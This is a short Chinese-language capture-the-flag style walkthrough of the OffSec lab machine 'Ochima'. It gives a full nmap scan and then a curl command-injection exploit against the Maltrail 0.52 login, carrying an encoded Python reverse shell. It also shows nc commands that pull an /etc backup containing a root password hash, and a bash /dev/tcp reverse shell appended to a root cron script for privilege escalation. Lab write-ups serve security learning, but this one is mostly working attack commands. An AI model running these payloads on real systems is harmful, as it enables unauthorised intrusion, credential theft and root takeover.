PG_Ochima

信息收集：

root@iZt4nbifrvtk7cy11744y4Z:~# nmap -p- -Pn -A -sS -T4 192.168.216.32Starting Nmap 7.80 ( https://nmap.org ) at 2025-02-27 12:50 CSTNmap scan report for 192.168.216.32Host is up (0.0029s latency).Not shown: 65532 filtered portsPORT     STATE SERVICE VERSION22/tcp   open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)80/tcp   open  http    Apache httpd 2.4.52 ((Ubuntu))|_http-server-header: Apache/2.4.52 (Ubuntu)|_http-title: Apache2 Ubuntu Default Page: It works8338/tcp open  unknown| fingerprint-strings: |   GetRequest: |     HTTP/1.0 200 OK|     Server: Maltrail/0.52|     Date: Thu, 27 Feb 2025 04:52:34 GMT|     Connection: close|     Content-Type: text/html|     Last-Modified: Sat, 31 Dec 2022 22:58:57 GMT|     Content-Security-Policy: default-src 'self'; style-src 'self''unsafe-inline'; img-src * blob:; script-src 'self''unsafe-eval' https://stat.ripe.net; frame-src *; object-src 'none'; block-all-mixed-content;|     Cache-Control: no-cache|     Content-Length: 7091|     <!DOCTYPE html>|     <html lang="en">|     <head>|     <meta http-equiv="X-UA-Compatible" content="IE=edge">|     <meta http-equiv="Content-Type" content="text/html;charset=utf8">|     <meta name="viewport" content="width=device-width, user-scalable=no">|     <meta name="robots" content="noindex, nofollow">|     <title>Maltrail</title>|     <link rel="stylesheet"type="text/css" href="css/thirdparty.min.css">|     <link rel="stylesheet"type="text/css" hre|   HTTPOptions: |     HTTP/1.0 501 Unsupported method ('OPTIONS')|     Server: Maltrail/0.52|     Date: Thu, 27 Feb 2025 04:52:34 GMT|     Connection: close|     Content-Type: text/html;charset=utf-8|     Content-Length: 500|     <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"|     "http://www.w3.org/TR/html4/strict.dtd">|     <html>|     <head>|     <meta http-equiv="Content-Type" content="text/html;charset=utf-8">|     <title>Error response</title>|     </head>|     <body>|     <h1>Error response</h1>|     <p>Error code: 501</p>|     <p>Message: Unsupported method ('OPTIONS').</p>|     <p>Error code explanation: HTTPStatus.NOT_IMPLEMENTED - Server does not support this operation.</p>|     </body>|_    </html>1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :SF-Port8338-TCP:V=7.80%I=7%D=2/27%Time=67BFEF92%P=x86_64-pc-linux-gnu%r(GeSF:tRequest,1D5C,"HTTP/1.0x20200x20OKrnServer:x20Maltrail/0.52rnDSF:ate:x20Thu,x2027x20Febx202025x2004:52:34x20GMTrnConnection:x20SF:closernContent-Type:x20text/htmlrnLast-Modified:x20Sat,x2031x20SF:Decx202022x2022:58:57x20GMTrnContent-Security-Policy:x20default-sSF:rcx20'self';x20style-srcx20'self'x20'unsafe-inline';x20img-srcx20SF:*x20blob:;x20script-srcx20'self'x20'unsafe-eval'x20https://stat.SF:ripe.net;x20frame-srcx20*;x20object-srcx20'none';x20block-all-miSF:xed-content;rnCache-Control:x20no-cachernContent-Length:x207091rSF:nrn<!DOCTYPEx20html>n<htmlx20lang="en">nx20x20x20x20<head>SF:nx20x20x20x20x20x20x20x20<metax20http-equiv="X-UA-CompatibleSF:"x20content="IE=edge">nx20x20x20x20x20x20x20x20<metax20htSF:tp-equiv="Content-Type"x20content="text/html;charset=utf8">nx20SF:x20x20x20x20x20x20x20<metax20name="viewport"x20content="widtSF:h=device-width,x20user-scalable=no">nx20x20x20x20x20x20x20x2SF:0<metax20name="robots"x20content="noindex,x20nofollow">nx20x2SF:0x20x20x20x20x20x20<title>Maltrail</title>nx20x20x20x20x20SF:x20x20x20<linkx20rel="stylesheet"x20type="text/css"x20href="cSF:ss/thirdparty.min.css">nx20x20x20x20x20x20x20x20<linkx20reSF:l="stylesheet"x20type="text/css"x20hre")%r(HTTPOptions,2AE,"HTTP/SF:1.0x20501x20Unsupportedx20methodx20('OPTIONS')rnServer:x20MalSF:trail/0.52rnDate:x20Thu,x2027x20Febx202025x2004:52:34x20GMTrSF:nConnection:x20closernContent-Type:x20text/html;charset=utf-8rnCoSF:ntent-Length:x20500rnrn<!DOCTYPEx20HTMLx20PUBLICx20"-//W3C//DTSF:Dx20HTMLx204.01//EN"nx20x20x20x20x20x20x20x20"http://wwwSF:.w3.org/TR/html4/strict.dtd">n<html>nx20x20x20x20<head>nx20SF:x20x20x20x20x20x20x20<metax20http-equiv="Content-Type"x20contSF:ent="text/html;charset=utf-8">nx20x20x20x20x20x20x20x20<titlSF:e>Errorx20response</title>nx20x20x20x20</head>nx20x20x20x20<SF:body>nx20x20x20x20x20x20x20x20<h1>Errorx20response</h1>nx20SF:x20x20x20x20x20x20x20<p>Errorx20code:x20501</p>nx20x20x20SF:x20x20x20x20x20<p>Message:x20Unsupportedx20methodx20('OPTIONS'SF:).</p>nx20x20x20x20x20x20x20x20<p>Errorx20codex20explanatioSF:n:x20HTTPStatus.NOT_IMPLEMENTEDx20-x20Serverx20doesx20notx20suppSF:ortx20thisx20operation.</p>nx20x20x20x20</body>n</html>n");Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed portAggressive OS guesses: Linux 2.6.32 (91%), Crestron XPanel control system (90%), ASUS RT-N56U WAP (Linux 3.4) (87%), Linux 3.1 (87%), Linux 3.16 (87%), Linux 3.2 (87%), HP P2000 G3 NAS device (87%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (87%), Linux 2.6.32 - 3.1 (86%), Infomir MAG-250 set-top box (86%)No exact OS matches for host (test conditions non-ideal).Network Distance: 4 hopsService Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelTRACEROUTE (using port 22/tcp)HOP RTT     ADDRESS1   2.14 ms 192.168.45.12   2.14 ms 192.168.45.2543   2.85 ms 192.168.251.14   2.96 ms 192.168.216.32OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 181.00 seconds

开放了80和8338端口，8338端口开启了一个Maltrail服务，版本为0.52

VPN连接实在收不到shell，换成offsec在线的kali了.....

curl http://192.168.55.32:8338/login --data 'username=;`echo+"cHl0aG9uMyAtYyAnaW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zO3M9c29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCxzb2NrZXQuU09DS19TVFJFQU0pO3MuY29ubmVjdCgoIjE5Mi4xNjguNDkuNTUiLDgwKSk7b3MuZHVwMihzLmZpbGVubygpLDApOyBvcy5kdXAyKHMuZmlsZW5vKCksMSk7b3MuZHVwMihzLmZpbGVubygpLDIpO2ltcG9ydCBwdHk7IHB0eS5zcGF3bigiYmFzaCIpJw"+|+base64+-d+|+bash`'

拿到shell

拿到local

这个靶机貌似有严格的防火墙设置，只能80和8338端口出，在用户目录发现etc_backup.tar文件，疑似etc下面的备份文件

使用nc传输文件

kali执行：nc -lnvp 8338 > etc_backup.tar靶机执行：cat etc_backup.tar | nc 192.168.49.56 8338

下载下来发现了shadow文件

root:$y$j9T$VdNCwN5thdnTPXpr87UrZ/$DOfFXgmuYsSQZ5S9GU5faFj8Z/BPpLMD80aEPFmIxt9:19702:0:99999:7:::

尝试john不支持破解这种格式，通过信息收集发现在/var/backups下面发现了/etc备份脚本，并且会定期root身份运行

反弹shell命令写入到etc_Backup.sh脚本中

echo"sh -i >& /dev/tcp/192.168.49.56/8338 0>&1" >> etc_Backup.sh

监听8338端口稍等一会就会收到root的shell，拿到proof